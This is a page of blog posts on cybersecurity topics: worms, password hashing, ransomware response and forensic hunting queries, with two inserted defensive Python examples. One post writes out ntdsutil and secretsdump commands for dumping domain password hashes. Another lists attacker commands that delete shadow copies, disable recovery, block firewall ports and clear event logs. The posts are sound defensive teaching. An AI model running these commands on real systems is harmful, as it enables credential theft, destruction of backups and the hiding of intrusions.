Search Results


  • The Evolution and Impact of Worms in Cybersecurity

    In the world of cybersecurity, attackers are always looking for ways to compromise systems efficiently and effectively. One method that has been around for decades, but continues to evolve and cause significant damage, is the use of worms. Worms are a type of malicious software that can spread across networks, infecting multiple systems without the need for direct human intervention.

    What Are Worms?

    Worms are automated attack tools designed to spread through networks. Unlike traditional malware that requires some form of user interaction, such as opening a malicious email attachment, worms can propagate themselves. Here’s how they typically work:

    - Initial Infection: A worm infects the first vulnerable system it encounters.
    - Scanning: From the compromised system, the worm scans the network for other vulnerable systems.
    - Replication: The worm then copies itself to those systems, repeating the process and spreading further.

    Each instance of the worm is called a "segment," and as it moves from system to system, it continues to multiply, often at an exponential rate.

    The History of Worms

    Worms have been a part of the cybersecurity landscape for decades. One of the earliest and most famous examples is the Morris Worm, created by Robert Tappan Morris, Jr., in 1988. This worm caused significant disruption to the early internet, highlighting the destructive potential of such self-replicating malware. Even before the Morris Worm, researchers at Xerox PARC were exploring the concept of worms for efficiently distributing software across networked computers, though not with malicious intent.

    Worm Evolution: Getting More Dangerous

    Worms have significantly evolved over the years, becoming more sophisticated and harder to defend against. Here are some key developments:

    - Multi-Exploit Worms: Early worms typically exploited a single vulnerability. Modern worms, however, can use multiple exploits to infect systems. For example, the Nimda worm from 2001 used about 12 different exploits, including those targeting web servers, email systems, and file sharing. Conficker, another notorious worm, used three main methods to spread: exploiting a Windows vulnerability, copying itself to USB drives, and guessing passwords for network shares.
    - Multiplatform Worms: Initially, worms targeted a single operating system. However, worms like Stuxnet have demonstrated the ability to affect multiple platforms. Stuxnet was primarily aimed at Windows systems but also manipulated industrial control systems, showcasing a significant leap in worm capabilities.
    - Zero-Day Exploit Worms: Zero-day exploits are vulnerabilities that are unknown to the software vendor and the security community at the time of the attack. Worms using zero-day exploits are particularly dangerous because there are no existing patches or defenses against them when they first appear. Stuxnet, for instance, utilized four zero-day exploits, making it extremely difficult to defend against initially.

    The Threat of Worm Evolution

    As worms continue to evolve, we need to prepare for even more sophisticated variants. Future worms may:

    - Use multiple exploits across different platforms: This makes patching systems more complex, as organizations need to address vulnerabilities across various operating systems simultaneously.
    - Spread rapidly using zero-day exploits: With no patches available initially, these worms can cause widespread damage before security teams have a chance to respond.

    Conclusion

    Worms represent a significant threat in the cybersecurity landscape, continually evolving to become more destructive and harder to defend against. By understanding their behavior and preparing robust defense mechanisms, we can mitigate the risk they pose. Staying vigilant and proactive is key to protecting our networks from these automated and relentless attackers.

    Akash Patel

  • Evolution of UNIX and Linux Password Storage

    In the early days of UNIX and Linux systems, passwords were stored using the DES encryption algorithm, often without the use of a salt. Usernames and passwords were kept in the /etc/passwd file, which was readable by all users. This practice posed a security risk as the passwords were relatively easy to access and crack.

    Improvements in Password Storage

    Transition to MD5 and Beyond

    As security concerns grew, UNIX and Linux systems moved towards stronger hashing algorithms and better storage practices. Passwords began to be hashed using MD5, and later algorithms such as Blowfish, SHA-256, and SHA-512. Along with the stronger algorithms, the use of salt became standard practice. Initially, salts were 4 bytes long, but later expanded to 8 bytes.

    To improve security further, password hashes were moved to the /etc/shadow file, which has restrictive permissions and is only readable by the root user. Meanwhile, the /etc/passwd file remained world-readable but did not contain sensitive hash data.

    Password Hashing in /etc/shadow

    In modern UNIX and Linux systems, the /etc/shadow file contains password hashes in a format that includes the hash type, the salt, and the hashed password, separated by dollar signs ($). The structure is as follows:

        username:$id$salt$hashed_password

    - $1$ indicates MD5 hashing.
    - $2$ indicates Blowfish hashing.
    - $5$ indicates SHA-256 hashing.
    - $6$ indicates SHA-512 hashing.

    For example:

        sec504:$6$1ArFQuUx$qhCcp4hKJvWxf47bm30iFs3CldfvKy/z28wN24GuOwBfcgOF8j2iYgl15eFPyMQ0HzE.PyXrIqE3FpnF4vdPq.

    This entry shows a SHA-512 hash ($6$), with an 8-byte salt (1ArFQuUx) and the resulting hashed password.

    Enhancing Password Security

    Multiple Rounds of Hashing

    To thwart password-cracking attempts, modern hashing algorithms often use multiple rounds of hashing. For instance:

    - MD5 crypt ($1$) uses 1,000 rounds.
    - SHA-256 ($5$) and SHA-512 ($6$) use 5,000 rounds by default.

    Multiple rounds slow down the hashing process, making it computationally expensive for attackers to crack passwords using brute force or dictionary attacks.

    GPU-based Attacks

    Attackers have adapted by utilizing GPUs to speed up the password-cracking process. GPUs can perform many parallel computations, significantly increasing the number of hashes that can be computed per second. For example, an NVIDIA GeForce RTX 2070 can compute around 768,500 SHA-512 hashes per second.

    Mitigating Advanced Cracking Techniques

    To counter GPU-based attacks, more sophisticated hashing algorithms have been developed:

    - PBKDF2 (Password-Based Key Derivation Function 2): Uses a flexible number of hashing rounds, typically in the thousands or millions.
    - Bcrypt: Incorporates a memory-intensive hashing process, which is difficult for GPUs to optimize.
    - Scrypt: Requires even more memory, making it particularly resistant to GPU-based attacks.
    - Argon2: The winner of the Password Hashing Competition, designed to be memory-hard and resistant to GPU attacks.

    Conclusion

    As attackers become more sophisticated, so too must the mechanisms for securing passwords. Modern UNIX and Linux systems use advanced hashing techniques to ensure that password storage remains as secure as possible.

    Akash Patel
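As an added example (not code from the original post), the following Python parses /etc/shadow lines in the $id$salt$hash format described above, reports the algorithm, salt and round count for each account, and flags the weak cases the post discusses: DES crypt, MD5 crypt, rounds lowered below the default, and empty password fields. The bcrypt cost threshold is an assumed audit value, and every sample entry except the post's sec504 line is constructed.

```python
"""Parse and audit /etc/shadow hash fields.

Added example, not code from the original post. It assumes the crypt(5)
modular format described above ($id$salt$hash, with an optional rounds=N
parameter for $5$ and $6$) and a constructed set of shadow entries.
"""
from dataclasses import dataclass, field
from typing import List, Optional

# Identifiers described in the post plus the bcrypt variants ($2a/$2b/$2y)
# and yescrypt ($y$) seen on current distributions.
HASH_IDS = {
    "1": "md5crypt",
    "2": "bcrypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
    "5": "sha256crypt",
    "6": "sha512crypt",
    "y": "yescrypt",
}
# Default iteration counts quoted in the post.
DEFAULT_ROUNDS = {"md5crypt": 1000, "sha256crypt": 5000, "sha512crypt": 5000}
MIN_BCRYPT_COST = 10  # assumed audit threshold, not from the post


@dataclass
class ShadowEntry:
    user: str
    algorithm: str
    salt: Optional[str] = None
    rounds: Optional[int] = None
    digest: Optional[str] = None
    locked: bool = False
    findings: List[str] = field(default_factory=list)


def parse_shadow_line(line: str) -> ShadowEntry:
    """Split one /etc/shadow line and decode its password field."""
    user, pw = line.rstrip("\n").split(":", 2)[:2]
    entry = ShadowEntry(user=user, algorithm="none")
    # A leading "!" or "*" means password login is disabled for the account.
    entry.locked = pw.startswith(("!", "*"))
    body = pw.lstrip("!")
    if body in ("", "*"):
        if not entry.locked:
            entry.findings.append("empty password field: login without a password")
        return entry
    if not body.startswith("$"):
        # Legacy 13-character DES crypt: a 2-character salt followed by the hash.
        entry.algorithm = "descrypt"
        entry.salt, entry.digest = body[:2], body[2:]
        entry.findings.append("DES crypt: 8-character password limit, trivially crackable")
        return entry
    parts = body.split("$")[1:]  # drop the empty string before the first "$"
    entry.algorithm = HASH_IDS.get(parts[0], "unknown(" + parts[0] + ")")
    if entry.algorithm == "bcrypt":
        # $2b$<cost>$<22-char salt><31-char digest>; work factor is 2**cost.
        cost = int(parts[1])
        entry.rounds = 2 ** cost
        entry.salt, entry.digest = parts[2][:22], parts[2][22:]
        if cost < MIN_BCRYPT_COST:
            entry.findings.append("bcrypt cost " + str(cost) + " below " + str(MIN_BCRYPT_COST))
        return entry
    rest = parts[1:]
    entry.rounds = DEFAULT_ROUNDS.get(entry.algorithm)
    if rest and rest[0].startswith("rounds="):
        # $6$rounds=100000$salt$digest raises the iteration count above the default.
        entry.rounds = int(rest[0].split("=", 1)[1])
        rest = rest[1:]
    # Remaining fields are [<params>,] <salt>, <digest> (yescrypt carries params).
    if len(rest) >= 2:
        entry.salt, entry.digest = rest[-2], rest[-1]
    else:
        entry.findings.append("malformed field: salt or digest missing")
    if entry.algorithm == "md5crypt":
        entry.findings.append("md5crypt: obsolete, only 1,000 rounds")
    default = DEFAULT_ROUNDS.get(entry.algorithm)
    if default and entry.rounds is not None and entry.rounds < default:
        entry.findings.append("rounds lowered below the default of " + str(default))
    return entry


def audit_shadow(text: str) -> List[ShadowEntry]:
    """Parse every non-empty line of a shadow file."""
    return [parse_shadow_line(l) for l in text.splitlines() if l.strip()]


# Constructed sample: the sec504 line is the post's example; the rest are made up.
SAMPLE_SHADOW = """\
sec504:$6$1ArFQuUx$qhCcp4hKJvWxf47bm30iFs3CldfvKy/z28wN24GuOwBfcgOF8j2iYgl15eFPyMQ0HzE.PyXrIqE3FpnF4vdPq.:19000:0:99999:7:::
legacy:$1$AbCdEfGh$0123456789abcdefghijkl:19000:0:99999:7:::
hardened:$6$rounds=100000$Zz9YyXxWw$AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:19000:0:99999:7:::
svc:$2b$08$R9h/cIPz0gi.URNNX3kh2OPST9/PgBkqquzi.Ss7KIUgO2t0jWMUW:19000:0:99999:7:::
olddes:ab1XoMZuNzTe6:19000:0:99999:7:::
nobody:*:19000:0:99999:7:::
guest::19000:0:99999:7:::
"""

if __name__ == "__main__":
    for e in audit_shadow(SAMPLE_SHADOW):
        print(e.user, e.algorithm, e.salt, e.rounds, e.findings)
```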

  • Obtaining Windows Domain Controller Hashes

    Gaining access to Windows Domain Controller password hashes is a critical step for attackers aiming to compromise a Windows network.

    Step 1: Obtain NTDS.dit and SYSTEM Registry Hive Data

    NTDS.dit is the database that stores Active Directory (AD) data, including password hashes. To extract these hashes, attackers also need the SYSTEM registry hive, which contains the keys necessary to decrypt the NTDS.dit file.

    Using ntdsutil.exe

    - Access ntdsutil.exe: This built-in utility is used to manage AD data, including creating backups.
    - Activate Instance: Set the active instance to "ntds".
    - Create Backup:

        C:\Users\Administrator> ntdsutil
        ntdsutil: activate instance ntds
        Active instance set to "ntds".
        ntdsutil: ifm
        ifm: create full c:\ntds

    This sequence of commands creates a full backup of the AD data in the c:\ntds directory, including the NTDS.dit file and the SYSTEM registry hive.

    Step 2: Extracting Password Hashes

    After obtaining the NTDS.dit and SYSTEM files, the next step is to decrypt the NTDS.dit data and extract the password hashes.

    Using secretsdump.py from Impacket

    - Install Impacket: Ensure that Impacket is installed on the attacker’s machine.
    - Run secretsdump.py: This script reads and decrypts the NTDS.dit file using the SYSTEM registry hive.

    Command for secretsdump.py:

        python /usr/share/doc/python-impacket/examples/secretsdump.py -system registry/SYSTEM -ntds Active\ Directory/ntds.dit LOCAL

    The output will display the decrypted hashes:

        [*] Target system bootKey: 0x7b1c658edfb752594c688e02d4424924
        [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
        [*] Searching for pekList, be patient.
        [*] Pek found and decrypted: 0x1e0d9fa12fb2367f15f22517aa31e84d
        [*] Reading and decrypting hashes from Active Directory/ntds.dit
        Administrator:500:aad3b435b51404eeaad3b435b51404ee:9491b24e8c931559455ed4f59476cec2:::
        Guest:501:aad3b435b51404eeaad3b435b51404ee:31d2f4f1a07e9fb731e455e0b9a58265:::
        ksmith:1000:aad3b435b51404eeaad3b435b51404ee:0d4fa3ed8f51a0d45a7c7fbd0c92b99c:::

    Minimizing Detection

    Attackers prefer using built-in tools like ntdsutil because they are less likely to trigger security alerts compared to third-party tools. The built-in utilities are designed for system management and backups, thus their usage might not immediately raise suspicion.

    Alternative Methods

    There are other methods to obtain and extract NTDS.dit and SYSTEM data, such as using volume shadow copies or other administrative tools. Detailed methodologies and advanced techniques can be found in various penetration testing blogs and resources, such as the articles by @netbiosX on PentestLab.

    Conclusion

    Obtaining and decrypting Windows Domain Controller password hashes involves using built-in utilities to create backups of the necessary files and then employing scripts like secretsdump.py to extract the hashes. Understanding these methods highlights the importance of securing administrative access and monitoring the use of system utilities to prevent unauthorized access to sensitive data.

    We will continue this in the next post.

    Akash Patel

  • Forensic Investigation: Techniques and Tools for Effective Threat Hunting

    In the ever-evolving landscape of cybersecurity, forensic investigators must be equipped with a diverse set of tools and techniques to identify, analyze, and respond to various threats. This blog delves into several advanced methods for detecting malicious activity, focusing on Sysmon Event ID 1, RDP activity hunting, phishing and maldoc detection, and data exfiltration using the $UsnJrnl:$J file.

    1. Sysmon Event ID 1: Process Creation

    Sysmon (System Monitor) is a powerful tool that provides detailed information on process creation, network connections, and changes to file creation time, among other data. Sysmon logs, particularly Event ID 1, are invaluable for forensic investigators.

    Why Sysmon Event ID 1?

    - Comprehensive Process Tracking: Every time a process is created, Sysmon logs the event, capturing crucial details such as the process name, command line, and parent process.
    - Enhanced Visibility: Even if you lack Shimcache or SRUM data, Sysmon’s Event ID 1 can fill the gap by logging all process executions, giving you insight into potential malicious activity.

    Example Query: To identify potentially malicious processes executed via Office applications (common in phishing attacks), you can use the following query:

        (source_name:"Microsoft-Windows-Sysmon" AND event_id:1) AND process_parent_path:(*winword.exe OR excel.exe OR powerpnt.exe OR mspub.exe OR visio.exe)

    2. Hunting RDP Activity: Remote Logon Events

    Remote Desktop Protocol (RDP) is a common vector for unauthorized access. Monitoring RDP activities is crucial for identifying potential intrusions.

    Focus on Logon Events

    - Event ID 4624: This event logs successful logons, which can be filtered to focus on remote logons (Type 10) with RDP connectivity.
    - IP Address Filtering: Investigate events where the source IP address is external (i.e., not within the local 10.0.0.0/8 range or localhost 127.0.0.1).

    3. Identifying Infection Vectors: Phishing and Maldoc Hunting

    Phishing remains a prevalent attack vector, often delivering malicious documents (maldocs) that execute harmful payloads.

    Detecting Phishing and Maldocs

    - Office Applications as Parent Processes: When malware is executed via Office applications like Word or Excel, it’s often a sign of phishing.

      Example Query:

        (source_name:"Microsoft-Windows-Sysmon" AND event_id:1) AND process_parent_path:(*winword.exe OR excel.exe OR powerpnt.exe OR mspub.exe OR visio.exe)

    - ZIP Files Accessed in Windows: ZIP files are commonly used to deliver malicious payloads in phishing emails. Detecting ZIP files opened from temporary locations can indicate phishing activity.

      Example Query:

        (source_name:"Microsoft-Windows-Sysmon" AND event_id:1) AND process_parent_command_line:"appdata\\local\\temp\\temp1_*" AND process_parent_command_line.keyword:*temp1_*

    4. Data Exfiltration Detection: $UsnJrnl:$J and ZIP Files

    One of the key challenges in forensic investigations is detecting data exfiltration. Attackers often compress data into ZIP files before exfiltration. The $UsnJrnl:$J (Update Sequence Number Journal) file in NTFS can be a goldmine for detecting such activity.

    Using MFTECmd to Analyze $UsnJrnl:$J

    - Identifying ZIP Files: By parsing the $UsnJrnl:$J file, you can identify ZIP files created or modified on the system.

      Example PowerShell Command:

        $usnzip = Import-Csv -Path 'C:\Users\noransom\Desktop\.csv' | ? Extension -eq '.zip'

    - Detecting Deleted ZIP Files: Attackers might delete ZIP files after exfiltration to cover their tracks. However, traces remain in the $UsnJrnl:$J file.

      Example PowerShell Command:

        $deleted = $usnzip | ? UpdateReasons -like '*Delete*'
        $deleted | Format-Table -Property Extension,Name,ParentPath,UpdateReasons -AutoSize

    5. Additional Techniques for Enhanced Threat Hunting

    - Credential Reads: Event ID 5379 logs when stored credentials are accessed. Monitoring this event can reveal unauthorized access to sensitive information.

      Example Query:

        source_name:"Microsoft-Windows-Security-Auditing" AND event_id:5379 AND credentials_read:Microsoft_Windows_Shell_ZipFolder*

    - Outlook Content and Downloads: Detecting file creations within the Outlook cache path can uncover attempts to download and execute malicious attachments.

      Example Query:

        (source_name:"Microsoft-Windows-Sysmon" AND event_id:11) AND file_name:"microsoft\\windows\\inetcache\\content.outlook\\*"

    - Reviewing the Trust Center: Microsoft Office applications maintain a Trusted Documents list, which can be used to detect when a user has marked a malicious document as trusted.

      Example Query:

        (source_name:"Microsoft-Windows-Sysmon" AND event_id:13) AND registry_key_path:("Trusted Documents" OR "TrustRecords")

    Conclusion

    By leveraging the tools and techniques outlined in this blog, forensic investigators can enhance their ability to detect and respond to sophisticated threats. Whether it's hunting for signs of RDP activity, identifying phishing attempts, or detecting data exfiltration, these methods provide a robust foundation for effective threat hunting and incident response.

    Akash Patel
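The ZIP-file hunt in section 4 above, as an added Python example that is not part of the original post: it reproduces the two PowerShell filters (Extension -eq '.zip', UpdateReasons -like '*Delete*') over an MFTECmd $J CSV and adds a per-archive lifecycle so a created-then-deleted archive stands out. The column names (Name, Extension, ParentPath, UpdateTimestamp, UpdateReasons) are assumed to match MFTECmd's $J output, and the CSV rows are constructed.

```python
"""Hunt created-then-deleted ZIP archives in an MFTECmd $UsnJrnl:$J CSV.

Added example, not code from the original post. It assumes the MFTECmd
$J columns Name, Extension, ParentPath, UpdateTimestamp and UpdateReasons;
the CSV below is constructed sample data.
"""
import csv
import io
from collections import OrderedDict
from typing import Dict, List

# Constructed $J records: one archive staged on the Desktop, filled, then
# deleted; one created under %TEMP%; one unrelated document edit.
SAMPLE_USN_CSV = """\
Name,Extension,ParentPath,UpdateTimestamp,UpdateReasons
finance.zip,.zip,.\\Users\\noransom\\Desktop,2024-05-01 10:02:11.1234567,FileCreate
finance.zip,.zip,.\\Users\\noransom\\Desktop,2024-05-01 10:02:45.1234567,DataExtend|Close
report.docx,.docx,.\\Users\\noransom\\Documents,2024-05-01 10:03:00.1234567,DataOverwrite|Close
hr.zip,.zip,.\\Users\\noransom\\AppData\\Local\\Temp,2024-05-01 10:10:00.1234567,FileCreate|Close
finance.zip,.zip,.\\Users\\noransom\\Desktop,2024-05-01 10:40:03.1234567,FileDelete|Close
"""


def load_usn(text: str) -> List[dict]:
    """Read the CSV exactly as Import-Csv would: one dict per $J record."""
    return list(csv.DictReader(io.StringIO(text)))


def zip_records(rows: List[dict]) -> List[dict]:
    # Equivalent of: Import-Csv ... | ? Extension -eq '.zip'
    return [r for r in rows if r["Extension"].lower() == ".zip"]


def deleted_zips(rows: List[dict]) -> List[dict]:
    # Equivalent of: $usnzip | ? UpdateReasons -like '*Delete*'
    return [r for r in zip_records(rows) if "Delete" in r["UpdateReasons"]]


def zip_lifecycles(rows: List[dict]) -> Dict[str, dict]:
    """Collapse every $J record of each archive into one lifecycle entry."""
    lifecycles: Dict[str, dict] = OrderedDict()
    for r in sorted(zip_records(rows), key=lambda rec: rec["UpdateTimestamp"]):
        path = r["ParentPath"] + "\\" + r["Name"]
        entry = lifecycles.setdefault(path, {
            "created": None, "last_seen": None, "deleted": None,
            "reasons": [], "temp_location": "\\temp" in path.lower()})
        reasons = r["UpdateReasons"].split("|")
        entry["reasons"].extend(reasons)
        entry["last_seen"] = r["UpdateTimestamp"]
        if "FileCreate" in reasons and entry["created"] is None:
            entry["created"] = r["UpdateTimestamp"]
        if "FileDelete" in reasons:
            entry["deleted"] = r["UpdateTimestamp"]
    return lifecycles


def report(text: str) -> List[str]:
    """One line per archive, flagging the staging pattern (create, then delete)."""
    lines = []
    for path, lc in zip_lifecycles(load_usn(text)).items():
        flag = "CREATED-THEN-DELETED" if lc["created"] and lc["deleted"] else "present"
        if lc["temp_location"]:
            flag += ", temp dir"
        lines.append(f"{path}: {flag} (first {lc['created']}, last {lc['last_seen']})")
    return lines


if __name__ == "__main__":
    for line in report(SAMPLE_USN_CSV):
        print(line)
```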

  • What to Do After a Ransomware Attack

    Ransomware attacks are among the most devastating incidents an organization can face. They can cripple your operations, lead to significant financial loss, and damage your reputation. When a ransomware campaign is in progress, the clock is ticking, and how you respond in those critical moments can determine the extent of the damage.

    Immediate Response: The Clock Is Ticking

    The first thing to understand is that ransomware incidents require immediate action. The sooner you detect the ransomware actor in your network, the better your chances of minimizing damage. Here are the possible scenarios:

    - Immediate Detection Upon Network Access: GREAT! Work fast! This is the best-case scenario where you can potentially stop the attack before it causes significant harm.
    - Detection After They’ve Been in Your Network for a While: Work faster! At this point, the attacker may have already exfiltrated data or planted the encryption payload. Time is of the essence.
    - Detection Pre- or Post-Exfiltration, But Before Encryption: If you catch them in this window, you still have a chance to prevent encryption. However, be prepared for the possibility that encryption is imminent.
    - Detection After Encryption: Sadly, this is the most common scenario. At this stage, the focus shifts to damage control and recovery.

    In all these scenarios, having a pre-incident response plan is crucial. Without it, your response will be too slow, leading to greater damage.

    Initial Incident Scoping: Key Considerations

    When you first identify a ransomware incident, you need to quickly assess the situation. Here's what to consider:

    - How was the incident identified? Did someone notify you? Did you discover a ransom note or a service that stopped functioning?
    - Which hosts and services are impacted? Identify all the systems that have been compromised to understand the scope of the attack.
    - What actions have already been taken? Determine if any containment measures have been initiated and whether they were effective.
    - What are the organization’s expectations? Communicate with leadership to understand their priorities and what they expect from the incident response.
    - What are the “crown jewels” of the organization? Identify critical assets that need immediate protection.
    - Do backups exist, and are they unencrypted? Confirm the availability and integrity of backups, as they will be key to recovery.
    - Do up-to-date network diagrams exist? Accurate network diagrams are essential for understanding how the attack is spreading and for planning your response.
    - Is there an MSSP (Managed Security Service Provider) who can assist? If available, leverage external expertise to enhance your response efforts.

    Collecting and Preserving Evidence

    Evidence preservation is critical in a ransomware investigation. Here’s how to approach it:

    - Physical Evidence: Take a physical picture of the ransom note immediately, as it might be encrypted or deleted later.
    - Virtual Machines: If possible, pause virtual machines rather than shutting them down. Pausing a VM typically saves its memory state, which can be valuable for investigation.
    - Memory Capture: Capture a memory image from compromised systems to analyze for forensic evidence.

    Backup Protocols: Review and Invoke

    When ransomware hits, you may lose access to critical protocols needed for response. Here’s what to do:

    - Active Directory (AD) Availability: Be prepared for AD to be down, which is common in ransomware cases. Have alternative methods to navigate the network and access machines.
    - Local Accounts and Cached Domain Credentials: Ensure that machines have local accounts or cached credentials to maintain access.
    - Deployment Methods for Data Collection: If you need to install tools for data collection, ensure you have a deployment method available.
    - Out-of-Band Communication: Establish secure communication channels that are not dependent on the compromised network.

    Securing Backups: Protecting the Crown Jewels

    Your backup servers must be secured immediately:

    - On-Prem Backup: Disconnect from the network to prevent ransomware from spreading to backups.
    - Cloud-Based Backup: Consider disconnecting, depending on the situation, to protect your data.

    “Going Dark” – Cutting Internet Access

    If the threat actor is still active in your environment and you suspect imminent encryption, you may need to cut internet access:

    - Major Decision with Far-Reaching Consequences: This decision is not to be taken lightly and should be made by top leadership. While it might prevent encryption, it will disrupt business operations.
    - Pre-Plan Policies: Ensure you have pre-planned policies in place for such scenarios. Create pinholes for essential services like VPN, EDR, and remote IR connectivity.

    Disabling Shares, Sync Agents, and Accounts

    - Admin Shares: Disabling admin shares can thwart threat actors but may disrupt services. Conduct a risk analysis beforehand.
    - Network Shares and Distributed File Systems: Consider taking these down to protect them from encryption.
    - Credential Remediation: Reset credentials and disable accounts to prevent the threat actor from regaining access.

    Recovery from Backup

    Recovering from backups is a critical step, but timing is everything:

    - Hold Off Restoral Until You’re Sure: Ensure you know the exact date(s) to fall back to for recovery. Restoring from a compromised backup could reinfect your network.
    - Edge Devices: Firewalls and VPNs may have been exploited. Consider updating and restoring them to factory state to eliminate persistence mechanisms.

    Post-Incident: Turning a Crisis into an Opportunity

    A ransomware attack, while devastating, can also be an opportunity for your security team to gain the attention and support it needs:

    - Increased Support and Funding: Use the incident as leverage to secure more resources for your security team.
    - Staff Augmentation: Advocate for additional staffing to prevent future incidents.

    Final Thoughts: Learn, Plan, and Prepare

    Ransomware incidents are complex and require swift, decisive action. Preparation is key. Learn from each incident, refine your response plans, and ensure that your organization is better prepared for the next attack.

    Akash Patel

  • Final Phase of a Ransomware Attack: Impact and Recovery Challenges

    Ransomware attacks have become increasingly sophisticated, and the “Impact” phase represents the final, most destructive part of the attack campaign. During this phase, after threat actors have achieved their initial objectives, including data exfiltration, they may deploy a ransomware cryptor to encrypt your data. To maximize their leverage, these actors often tamper with your backup and recovery mechanisms, aiming to make recovery difficult and squeeze you into paying the ransom.

    Securing Your Backup Systems

    Your backups are one of the most critical assets to secure in your organization. Threat actors often target backup servers to disable or delete backups before deploying ransomware. Here are some essential steps to secure your backups:

    - Monitor All Logins to Backup Servers: Ensure that every login attempt to your backup servers is monitored and logged. This includes successful logins as well as failed attempts.
    - Implement the Principle of Least Privilege: Only designated accounts should have the necessary permissions to access and perform administrative actions on backup servers. Restrict access as much as possible to minimize the attack surface.
    - Scanning for Backup Services: Ransomware affiliates frequently scan for backup services by checking for open ports on well-known systems. To prevent this:
      - Review Documentation: Refer to your backup system’s documentation to understand which ports are used for various services.
      - Set Up Alerts: Monitor these ports and set up alerts for any suspicious activity.

    Volume Shadow Copy Service (VSS)

    Many organizations rely on Microsoft’s Volume Shadow Copy Service (VSS) for backups. While VSS can be a convenient way to back up critical files, it can also pose a security risk. VSS keeps copies of essential system files, such as registry hives, in an unlocked state, making them vulnerable to threat actors.

    Commands Used to Delete Shadow Copies: Ransomware operators may use the following commands to delete VSS shadow copies, thereby eliminating one of your recovery options:

        vssadmin.exe delete Shadows /all /quiet
        wmic shadowcopy delete /nointeractive
        Get-WmiObject Win32_ShadowCopy | % { $_.Delete() }
        Get-WmiObject Win32_ShadowCopy | Remove-WmiObject
        Get-WmiObject Win32_ShadowCopy | ForEach-Object { $_Delete(); }
        Get-CimInstance Win32_ShadowCopy | Remove-CimInstance

    By deleting these shadow copies, the attackers remove a significant recovery option, making it crucial to protect and monitor VSS on your systems.

    Tampering with Recovery Mechanisms

    Threat actors often disable built-in recovery components using native tools, making it difficult for organizations to recover from an attack. They may use tools like bcdedit, which manipulates Boot Configuration Data (BCD) settings, or wbadmin, which configures settings for Windows Backup.

    Commands Used to Disable Recovery Mechanisms:

        bcdedit /set {default} recoveryenabled no
        bcdedit /set {default} bootstatuspolicy ignoreallfailures
        wbadmin delete catalog -quiet
        wbadmin delete systemstatebackup -keepversions:0

    Preventing IT Response

    In addition to tampering with backup and recovery mechanisms, threat actors may also prevent IT teams from responding to the attack by weaponizing security mechanisms. They may disable Remote Desktop Protocol (RDP) or block inbound connectivity via Windows Firewall.

    Common Commands Used:

        Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled True
        New-NetFirewallRule -DisplayName "Block PORTS1" -Direction Inbound -LocalPort 80 -Protocol TCP -Action Block
        New-NetFirewallRule -DisplayName "Block PORTS2" -Direction Inbound -LocalPort 443 -Protocol TCP -Action Block
        netsh advfirewall set currentprofile state on
        netsh advfirewall set allprofiles state on
        netsh advfirewall firewall add rule name="Block PORTS6" protocol=TCP dir=in localport=80 action=block
        netsh advfirewall firewall add rule name="Block PORTS7" protocol=TCP dir=in localport=443 action=block

    These measures make it extremely difficult for IT teams to access affected hosts and respond to the threat, emphasizing the need for robust monitoring and proactive defense mechanisms.

    Clearing Windows Event Logs

    Threat actors often clear Windows Event Logs to cover their tracks. Unfortunately, this is a simple task in Windows, especially if logs are not being forwarded to a SIEM, log aggregator, or syslog server. The command Clear-EventLog is commonly used for this purpose.

    Commands to Clear Event Logs:

        Get-EventLog -LogName Security | Clear-EventLog
        Clear-EventLog -LogName Application, Security, System

    Clearing event logs can make post-incident analysis extremely difficult, highlighting the importance of having log forwarding in place.

    Payload Deployment Methods

    Ransomware payloads are often deployed via Group Policy Objects (GPOs). Unfortunately, many organizations do not audit GPO deployment, and admin accounts are often overprivileged. This lack of oversight can allow threat actors to create and deploy GPOs without constraint, leading to widespread ransomware deployment across a domain or forest.

    Threat actors may also use existing deployment methods such as SCCM, PDQ, or SolarWinds to deliver ransomware payloads. In addition, they commonly use native Windows tools like PsExec, WMIC, and BITS to execute processes remotely.

    Background Intelligent Transfer Service (BITS): BITS is a Windows service that transfers data in the background, often used by Microsoft to download updates. It’s an intelligent service that minimizes impact on user experience by managing bandwidth effectively. However, threat actors can exploit BITS to transfer malicious payloads.

    Detection Methods:

    - EDR, Event IDs 4688/4689 | Sysmon IDs 1/5: Monitor for bitsadmin.exe and review PowerShell logs for related cmdlets.
    - Event ID 7036: Monitor for service state changes in the System log.
    - Event ID 60: BITS has stopped transferring a file. Look for temporary files named BITFxxxx.tmp created in the target transfer directory.

    Example Using Sysmon Event ID 11: Monitor file creation events for BITS temporary files.

        file_path.keyword:/.*\\BITF[0-9]+\.tmp/

    Encryption Key Usage in Ransomware

    Modern ransomware typically uses asymmetric key encryption, also known as public key cryptography. The public key, embedded within the ransomware payload, encrypts the victim's data. The private key, which is necessary for decryption, remains with the attacker, and victims must pay the ransom to obtain it.

    File Write Methods: Overwrite vs. Copy/Delete

    Ransomware payloads use two general file write methods:

    - Overwrite/Rename: Opens the original file, replaces its contents with encrypted data, and renames the file.
    - Copy/Delete: Creates a new file with encrypted data, then deletes the original file.

    From a forensic perspective, the Overwrite/Rename method might leave evidence in the $UsnJrnl or $LogFile, while the Copy/Delete method might allow recovery of "deleted" files from unallocated disk space using tools like Bulk Extractor and PhotoRec. I already have a blog on recovering evidence using PhotoRec; do check it out: https://www.cyberengage.org/post/digital-evidence-techniques-for-data-recovery-and-analysis

    Detecting Encryption and Ransom Notes

    Monitoring for file creation events using Sysmon/EDR can help detect ransomware activity. Sysmon Event ID 2, for instance, logs file creation time changes, which can be indicative of ransomware encryption.

    To understand how a specific ransomware payload encrypts files, reverse engineers and malware analysts often disassemble or decompile the ransomware's code using tools like IDA Pro and Ghidra. Detailed write-ups on ransomware samples are valuable resources for incident response. The VX-Underground team maintains extensive collections of malware samples, including ransomware families, which can be instrumental for analysis: https://for528.com/vxug-samples

    The team also maintains an archive with various builders, including ransomware builders! https://vx-underground.org/

    Importance of Backing Up Encrypted Files

    Backing up encrypted files is crucial because:

    - Partially Encrypted Files: May still contain recoverable data.
    - Future Decryption Possibilities: Decryption keys or tools may become available in the future.

    If using a decryptor, exercise caution. Some decryptors may be flawed, ineffective, or even malicious. Always perform malware analysis on any decryptor before use. Free decryptors for some ransomware variants are available at No More Ransom’s site, which also offers the “Crypto Sheriff” tool for identifying ransomware strains and checking for available decryption resources.

        https://www.nomoreransom.org/en/decryption-tools.html
        https://www.nomoreransom.org/crypto-sheriff.php?lang=en

